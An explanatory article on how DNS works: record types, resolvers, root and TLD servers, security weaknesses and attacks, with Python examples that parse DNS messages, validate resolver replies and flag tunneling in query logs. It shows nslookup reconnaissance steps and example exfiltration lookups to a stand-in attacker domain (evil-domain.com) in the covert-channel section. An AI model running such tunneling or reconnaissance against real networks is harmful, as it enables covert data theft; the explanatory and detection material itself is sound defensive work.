October 7, 2021

What is DNS, the domain name system?

Basic principles of how DNS works on the Internet, and its security


The Domain Name System (DNS) is a fundamental component of modern networking: it translates between human-readable domain names and the underlying Internet Protocol (IP) addresses that connected devices use to communicate with each other. DNS predates the World Wide Web and underpins virtually all communication on the Internet, as well as other uses that could not even be imagined when it was developed in the early 80s. However, the lack of security features in this long-lived protocol has led to numerous vulnerabilities and attacks. In this article we will answer questions like "What is DNS?", "How does DNS work?" and "What are the different types of DNS records?"

What is DNS?

DNS is often described as the Internet's version of the Yellow Pages. In the old days, when you needed to find a business address, you looked it up in the Yellow Pages. DNS works the same way, except you don't actually have to search for anything: your Internet-connected computer does it for you. This is how your computer knows how to find Google, ESPN.com or Managedserver.it.

For two computers to communicate over an IP network, the protocol dictates that they need IP addresses. Think of an IP address as a street address: for one computer to "locate" another, it needs to know the other computer's number. Since most people are better at remembering names, such as www.google.it, than numbers, such as 142.250.185.163, a computer program was needed to translate names into IP addresses.

DNS is most often thought of in the context of the World Wide Web, but in truth there is a DNS lookup behind almost every type of network request, even those not initiated by a user. Software updates, social media apps and even malware generally connect to a host name rather than an IP address. This way, if the underlying IP address changes, connectivity can still be established.

How DNS works

DNS is such an integral part of the internet that it's important to understand how it works.

Think of DNS as an address book, but instead of mapping people's names to their addresses, the address book maps computer names to IP addresses. Each mapping is called a "DNS record". DNS clients on connected devices contact DNS servers to retrieve these records. Different types of records are used for different purposes. Web browsers rely on the "A" record type, while the "MX" record points to a mail server. This is how a website can be hosted with one service provider and email with another.

Here is a look at the "A" record for varonis.com as seen by the popular command line utility dig:

As you can see in the example, it is possible to have multiple records for a single host name or domain. This can be used to provide redundancy and load balancing.

The internet has a lot of computers, so there's no point in putting all these records into one big book. Instead, the DNS is organized into smaller books or domains. Domains can be very large, so they are further organized into smaller books, called "zones". No single DNS server stores all the books - that would be impractical.

Instead, DNS operates in a distributed fashion, with millions of servers around the world working together. When your computer wants to perform a DNS lookup, it may ask the DNS server on your local router. The local router will in turn make an "upstream" query to another DNS server, often provided by an Internet Service Provider. Queries for a domain can travel "upstream" until they reach the domain's authority, the "authoritative name server". In practice, the results are often "cached" at lower levels to avoid having to run the entire process for each query.

An authoritative name server is where administrators manage the host names and IP addresses for their domains. Whenever a DNS administrator wants to add, change or delete a host name or IP address, they make the change on their authoritative DNS server (sometimes called the "primary DNS server"). There are also "slave" (secondary) DNS servers, which keep copies of the DNS records for their zones and domains.

DNS queries, servers and record types

The basic concepts behind DNS are relatively simple, but over the years the technical side of things has become increasingly complex. Here is a look at some of the internal mechanics of the system:

What are the types of DNS queries?

A DNS query is the message sent by a client to a DNS server or between two DNS servers. A DNS query can be one of the following:

  1. Recursive DNS query

In a recursive DNS query, a DNS client contacts a server, which in turn makes upstream requests for the domain in question until a result is found. The only rule for a recursive query is that a result must be returned, if one exists. There can be one or dozens of recursions. The initial server, or even the local DNS client, may already have a cached result. A time-to-live (TTL) value determines how long one of these results can be cached; once the TTL expires, the client or server has to look the result up upstream again.

  2. Iterative DNS query

Unlike recursive DNS queries, iterative DNS queries do not travel upstream. Instead, the DNS server the client is addressing does its best to answer the query itself. If it cannot, it may refer the client to a different DNS server, such as an authoritative name server or a TLD name server. The requester continues this iterative process until it finds an answer or the query times out.

What are the types of DNS servers?

As already stated, DNS is a distributed system, which means that servers around the world work together to maintain and deliver DNS records. Different types of servers have different roles within the overall system:

  1. Recursive DNS

Sometimes called a recursive resolver, a DNS recursor receives queries from DNS clients, answers from its cache if it has a hit, or contacts a name server higher up the chain. Recursors are often run by ISPs, but it is easy to change a computer's DNS configuration to point at another resolver for performance, security or privacy reasons.

  2. DNS Root Server

As the name suggests, root servers are the foundation on which the entire DNS infrastructure is built. Root servers act as authoritative name servers for top level domains (TLDs) such as ".com" and ".net". There is a problem, however, because the root servers themselves are referred to by host names within those same TLDs. If a DNS client can't determine which name server to turn to for ".net", how can it possibly resolve a fully qualified domain like "a.root-servers.net"? The answer is that DNS clients and lower level servers are "bootstrapped" with a list of the thirteen root server IP addresses. These addresses rarely change, and only one of them needs to be reachable to discover the others.

  3. TLD name server

TLD name servers are second in importance only to root servers, as they know where to go to get answers for any domain within a given TLD. When looking up www.managedserver.it, a TLD server for ".it" responds first, pointing the client at the name server holding the records for the "managedserver" part of the domain name.

  4. Authoritative Nameserver

The authoritative name server is the last stop for a DNS query. This server, or more often a group of servers for redundancy, is the highest authority for a given domain. However, not all DNS queries reach the authoritative name server, as there may be cached results closer to the initial request.

Organizations often use DNS internally as well. The operation is not much different, except that DNS lookups and records remain within the corporate network rather than the Internet. This is known as "private" or "local" DNS as opposed to the public DNS service.

What are the types of DNS records?

DNS records come in a wide variety of types, each used for different purposes. Here are some of the most common:

  1. "A" record - The classic use of DNS: translates a domain name into an IPv4 address.
  2. "AAAA" record - Same function as an "A" record, but returns an IPv6 address instead of IPv4.
  3. "MX" record - Short for "Mail Exchange": identifies the e-mail server associated with the domain.
  4. "TXT" record - Used for a wide variety of purposes, from proof of domain ownership to the cryptographic e-mail signing used to fight spam.
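How these records actually travel on the wire, as an added example that is not code from the original article: the block builds a minimal DNS response in the RFC 1035 format (header, echoed question, answers with a compression pointer) and parses it back. It carries two "A" records for one name, the redundancy case mentioned above; the name, addresses and transaction ID are constructed.

```python
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """'www.example.com' -> length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_response(qid: int, qname: str, records: list, qtype: int = TYPE_A) -> bytes:
    """Build a DNS response: 12-byte header, the echoed question, then one
    answer per (rtype, ttl, rdata). Answer owner names use a compression
    pointer (0xC00C) back to the question name, which always sits at offset 12."""
    flags = 0x8180                                  # QR=1 response, RD=1, RA=1, RCODE=0
    msg = struct.pack("!HHHHHH", qid, flags, 1, len(records), 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", qtype, CLASS_IN)
    for rtype, ttl, rdata in records:
        msg += b"\xc0\x0c" + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata
    return msg


def read_name(msg: bytes, off: int):
    """Decode a name at `off`, following compression pointers.
    Returns (name, offset just after the name as it appears at `off`)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                   # pointer: 11xxxxxx xxxxxxxx
            if end is None:
                end = off + 2                       # pointer occupies two bytes
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), off if end is None else end


def parse_response(msg: bytes) -> dict:
    """Parse header, question and answer section into a plain dict."""
    qid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = read_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        data = ".".join(str(b) for b in rdata) if rtype == TYPE_A else rdata.hex()
        answers.append({"name": name, "type": rtype, "ttl": ttl, "data": data})
    return {"id": qid, "is_response": bool(flags & 0x8000),
            "question": (qname, qtype), "answers": answers}


if __name__ == "__main__":
    # Constructed sample: two A records for one host name (192.0.2.0/24 is a
    # documentation range), the redundancy / load-balancing case.
    wire = build_response(0x1234, "www.example.com",
                          [(TYPE_A, 300, bytes([192, 0, 2, 10])),
                           (TYPE_A, 300, bytes([192, 0, 2, 11]))])
    print(wire.hex())
    print(parse_response(wire))
```

Feeding the same bytes to a packet dissector shows the identical layout, which is why a tool like Wireshark can read every query and answer on the wire.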

Advantages and weaknesses of DNS

Benefits

There are many good reasons why we are still using DNS after all these years. Some of the advantages of the system include:

  • It is distributed and resilient

There weren't many domains in use during the early days of the internet, so it's conceivable that we could have ended up with a single central database with all domain-to-IP mappings. This, of course, would not have allowed the scalability needed to power the modern Internet. The distributed nature of DNS also means that the system is resilient; a power outage, a cut fiber cable, or a cyber attack on a DNS server will not interrupt the system as a whole.

  • It is versatile and extensible

DNS developers have always wanted the protocol to be extensible as technology progressed. Extensions to the original DNS standard brought new features and functionality while maintaining backward compatibility. Over the years, new record types, improved rules for DNS packet delivery, and improved security have been added.

  • It is an open and well documented standard

DNS was not born out of a particular provider's dominance or a desire to gain market share. The Internet Engineering Task Force (IETF) openly publishes the set of rules that make up the protocol, allowing any software developer to implement DNS in their products. There are many different DNS client and server implementations, but because they conform to a common standard, they can all work together.

Weaknesses and Vulnerabilities

The first iterations of the Domain Name System (DNS) date back to the early 80s, well before the emergence of modern cybersecurity threats. As a result, DNS and many other older protocols still in use today, such as ARP and ICMP, never included much in the way of security features. In the years since, a number of extensions and mitigations have been devised as new threats emerged, but DNS is still frequently abused by attackers.

From a threat actor's point of view, there are several characteristics that make DNS attractive:

  • Every network uses it

DNS is ubiquitous. Almost every computer network in the world sees thousands or millions of DNS queries every single day. While not strictly necessary for an IP network to work, blocking or throttling DNS simply isn't practical, so nearly every firewall on the planet is configured to allow outbound traffic on port 53. This means attackers not only have an almost guaranteed way out of a compromised network, but also a lot of legitimate traffic to blend in with.

  • There is no authentication

Like many other early network protocols, DNS never included an authentication mechanism. This means that in the core DNS protocol it is not possible to be sure that a given result is authentic. Attackers have exploited this in a whole range of spoofing and poisoning attacks, targeting everything from individual machines to vast swathes of the Internet.

The lack of DNS authentication became headline news in 2008 when security researcher Dan Kaminsky discovered a huge vulnerability that could have allowed attackers to poison the cache of almost any DNS server in use at the time. The result was that, even with very little technical skill, an attacker could trick legitimate DNS servers into handing out bogus IP information for important domains such as a bank or a government institution.

Faced with the threat of bogus DNS records wreaking havoc in the internet community, service providers and standardization bodies have teamed up to adopt something called Domain Name System Security Extensions (DNSSEC). DNSSEC uses public key cryptography to digitally sign DNS results, ensuring that the response to a query is truly authentic.

  • There is no encryption either

DNS queries and their responses are sent in the clear, which means anyone on the network can view them with a tool like Wireshark. This raises privacy concerns, because it means your co-workers, your boss or even your ISP can tell which domains you interacted with. This is also true for websites that use SSL/TLS encryption: the actual data transferred between the site and your computer may not be viewable, but the initial DNS query that gave you the site's IP address in the first place is.

Two competing approaches have been advanced to wrap DNS traffic in a layer of encryption as it passes through a network: DNS over HTTPS (DoH) and DNS over TLS (DoT). Which approach to use, and whether DNS should be encrypted in the first place, is the subject of heated debate.

Types of DNS attacks

DNS reconnaissance attacks

DNS is all about information, which from an attacker's perspective can be a valuable tool. DNS queries can be used to map a victim's network infrastructure by revealing live hosts on a network, discovering the host names of high-value targets such as mail and file servers, and providing clues about the applications and services in use. You can perform your own local DNS reconnaissance simply by following the instructions below:

If you have a Windows computer, run the following commands as they are; if you are a Linux user, there are corresponding commands you can search for.

  1. Open a command prompt (press Ctrl+Esc, type "cmd", then press Enter).
  2. Type ipconfig.
  3. You will see the DNS domain you are in (the connection-specific DNS suffix), your IP address and a number of other things. You will want to refer to these.
  4. Type nslookup [IP address]. You will see the name of the DNS server that is responding and, if the name is known, the DNS record listing the name and IP address.
  5. Type nslookup -type=soa [your domain]. This command returns your domain's authoritative DNS server, which would be of interest to someone trying to infiltrate a network.
  6. Type nslookup -type=MX [your domain]. This command returns all the mail servers for your local domain, in case you want to hack mail servers and don't know where they are.

As we have already learned, most networks have a lot of DNS queries going on all the time. To many standard security products and network monitoring solutions, the queries an attacker uses to enumerate a network do not look much different from all the other, legitimate queries.

DNS hijacking to redirect traffic

The lack of authentication in the original DNS protocol gives attackers a huge advantage because it means that queries and responses can be manipulated or spoofed in many different places from the local machine to the global DNS resolvers.

A classic local network attack chains ARP spoofing with a rogue DNS server. If successful, this causes other machines on the network to funnel their DNS queries to a server controlled by the attacker, who can then return their own IP addresses for those queries instead of the legitimate ones. Without mitigations in place, a user could type in a domain like example.com, see a page load, and never have any indication that they were actually communicating with a malicious fake.

Attackers can also use a variety of techniques to poison the cache of legitimate DNS servers. This typically happens where organizations run their own local DNS recursor; a successful cache poisoning attack on a large public DNS provider could have a global impact, so those providers tend to be very security conscious. However, even the big providers are not immune to vulnerabilities.

If an attacker successfully spoofs a DNS response, the receiving DNS server caches the poisoned record. So how does this help the attacker?

Here's an example. Let's say an attacker learns that your organization uses an external application for something important, like expenses. If they poison your organization's DNS server so that it sends every user to the attacker's server, all they have to do is create a legitimate-looking login page and users will enter their credentials. They could even forward the traffic on to the real server (acting as a "man in the middle"), so that no one notices. The attacker can then try those credentials on other systems, sell them, or just celebrate with a wicked laugh.
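The checks a resolver applies before it caches a reply, as an added illustration that is not code from the article: a spoofed response only gets into the cache if it matches the transaction ID, the randomized source port, the question section and the bailiwick (the zone the answering server is allowed to speak for). The data classes, function names and the scenario below are constructed.

```python
from dataclasses import dataclass


@dataclass
class PendingQuery:
    """What the resolver remembers about a query it has sent upstream."""
    qname: str
    qtype: str
    txid: int          # 16-bit ID in the DNS header, randomly chosen per query
    src_port: int      # randomized UDP source port the query left from
    upstream: str      # IP address the query was sent to
    zone: str          # zone the upstream server is believed to be authoritative for


@dataclass
class Response:
    """Fields of a reply as seen on the wire."""
    src_ip: str
    dst_port: int
    txid: int
    qname: str
    qtype: str
    answers: list      # (owner_name, rtype, ttl, rdata) tuples


def in_bailiwick(owner: str, zone: str) -> bool:
    """True if owner equals zone or lies below it, i.e. the zone may speak for it."""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


def accept_response(pending: PendingQuery, resp: Response):
    """Return (accepted, reason). An off-path spoofer has to guess both the
    16-bit ID and the source port; without port randomization only the ID
    stands between them and the cache."""
    if resp.src_ip != pending.upstream:
        return False, "reply from a server we did not ask"
    if resp.dst_port != pending.src_port:
        return False, "reply to a port we did not use"
    if resp.txid != pending.txid:
        return False, "transaction ID mismatch"
    if (resp.qname.lower(), resp.qtype) != (pending.qname.lower(), pending.qtype):
        return False, "question section does not match our query"
    return True, "ok"


def cacheable_records(pending: PendingQuery, resp: Response) -> list:
    """Keep only records the answering zone is entitled to provide: a reply
    for www.example.com must not plant a record for a name outside example.com."""
    ok, _ = accept_response(pending, resp)
    if not ok:
        return []
    return [r for r in resp.answers if in_bailiwick(r[0], pending.zone)]


if __name__ == "__main__":
    # Constructed scenario: the resolver asked example.com's server for www.example.com.
    pending = PendingQuery("www.example.com", "A", txid=0x4A3F, src_port=51234,
                           upstream="192.0.2.53", zone="example.com")
    genuine = Response("192.0.2.53", 51234, 0x4A3F, "www.example.com", "A",
                       [("www.example.com", "A", 300, "192.0.2.10"),
                        ("login.other-bank.example", "A", 86400, "198.51.100.7")])
    print(cacheable_records(pending, genuine))        # the out-of-bailiwick record is dropped
    spoofed = Response("192.0.2.53", 40000, 0x4A3F, "www.example.com", "A",
                       [("www.example.com", "A", 300, "198.51.100.7")])
    print(accept_response(pending, spoofed))          # right ID, wrong port: rejected
```

A forged reply that matches all of these values is still accepted, which is exactly the gap that DNSSEC signatures close.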

Using DNS as a covert channel

Since outgoing DNS traffic is hardly ever blocked, and there tends to be a lot of it, using DNS for data exfiltration or covert communication has become a favorite tactic of many sophisticated adversaries. The attacker's goal is to blend in with all that legitimate network traffic through a technique called DNS tunneling. In some cases, an attacker will simply use the DNS protocol to carry data, something it was never intended for. This is risky for them, however, because it can produce large spikes or unusual traffic patterns that a well-prepared organization will quickly notice.

A more sophisticated approach misuses the DNS infrastructure itself. The attacker sets up a DNS domain on the Internet (evil-domain.com, for example) and runs an authoritative name server for it. Then, on the compromised host, the attacker uses a program that splits the data into small chunks and embeds them in a series of lookups, like so:

  • nslookup My1secret1.evil-domain.com
  • nslookup is1that1I1know.evil-domain.com
  • nslookup how2steal1data.evil-domain.com

The organization's DNS server (corp.com in this example) receives these requests, finds that the results are not in its cache, and relays them to the authoritative name server for evil-domain.com. The attacker is expecting this traffic and runs a program on that authoritative name server which extracts the first part of each query (everything before evil-domain.com) and reassembles the data. Unless the organization inspects the queries its DNS servers make, it may never realize that they were used to exfiltrate data.
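One way to spot the pattern just described in a resolver's query log, as an added detection example that is not part of the original article: per parent domain it counts distinct subdomain prefixes and measures their length and character entropy, since chunks of encoded data look nothing like ordinary host names. The log format, the sample lines (which reuse the three evil-domain.com names above) and the thresholds are constructed assumptions.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed query-log sample in the form "timestamp client qname qtype".
SAMPLE_LOG = """\
2021-10-07T10:00:01 10.0.0.5 www.managedserver.it A
2021-10-07T10:00:02 10.0.0.5 mail.corp.example MX
2021-10-07T10:00:03 10.0.0.9 My1secret1.evil-domain.com A
2021-10-07T10:00:03 10.0.0.9 is1that1I1know.evil-domain.com A
2021-10-07T10:00:04 10.0.0.9 how2steal1data.evil-domain.com A
2021-10-07T10:00:04 10.0.0.9 4a6f686e2e446f65.evil-domain.com TXT
2021-10-07T10:00:05 10.0.0.9 7061737377303064.evil-domain.com TXT
2021-10-07T10:00:06 10.0.0.5 www.managedserver.it A
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded or encrypted chunks score higher than words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parent_domain(qname: str, levels: int = 2) -> str:
    """Naive registrable domain (last two labels); use a public-suffix list in practice."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-levels:])


def profile(log_text: str) -> dict:
    """Per parent domain: query count, distinct subdomain prefixes, mean prefix
    length and mean prefix entropy."""
    stats = defaultdict(lambda: {"queries": 0, "unique": set(), "len": 0.0, "entropy": 0.0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                 # skip malformed lines rather than crash
        qname = m.group(3).rstrip(".").lower()
        parent = parent_domain(qname)
        prefix = qname[: -len(parent)].rstrip(".")   # everything left of the parent domain
        s = stats[parent]
        s["queries"] += 1
        s["unique"].add(prefix)
        s["len"] += len(prefix)
        s["entropy"] += shannon_entropy(prefix)
    return {p: {"queries": s["queries"], "unique": len(s["unique"]),
                "mean_len": s["len"] / s["queries"],
                "mean_entropy": s["entropy"] / s["queries"]}
            for p, s in stats.items()}


def suspicious_domains(log_text: str, min_unique: int = 4,
                       min_len: float = 10.0, min_entropy: float = 2.5) -> list:
    """Parent domains whose subdomains look like data chunks rather than host
    names. The thresholds are assumptions: tune them against your own baseline."""
    return sorted(p for p, s in profile(log_text).items()
                  if s["unique"] >= min_unique and s["mean_len"] >= min_len
                  and s["mean_entropy"] >= min_entropy)


if __name__ == "__main__":
    for parent, s in profile(SAMPLE_LOG).items():
        print(f"{parent:20} queries={s['queries']} unique={s['unique']} "
              f"mean_len={s['mean_len']:.1f} entropy={s['mean_entropy']:.2f}")
    print("suspicious:", suspicious_domains(SAMPLE_LOG))
```

Run against the resolver's own outbound queries (not just client queries), since that is where the relayed evil-domain.com lookups are visible.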

And even more types of attacks!

The list above is by no means a complete list of all possible DNS attacks. The protocol has been abused for everything from DDoS campaigns to covert monitoring of Internet users. Attackers have recently been observed modifying the DNS configuration of various home routers to spread malware. Both malicious actors and security researchers are constantly on the lookout for new vulnerabilities, and their attention is unlikely to shift anytime soon.

DNS has been around for a long time, and every computer connected to the Internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and to create covert communication channels. Fortunately, by monitoring DNS servers and applying security analytics, many of these attacks can be detected and prevented.
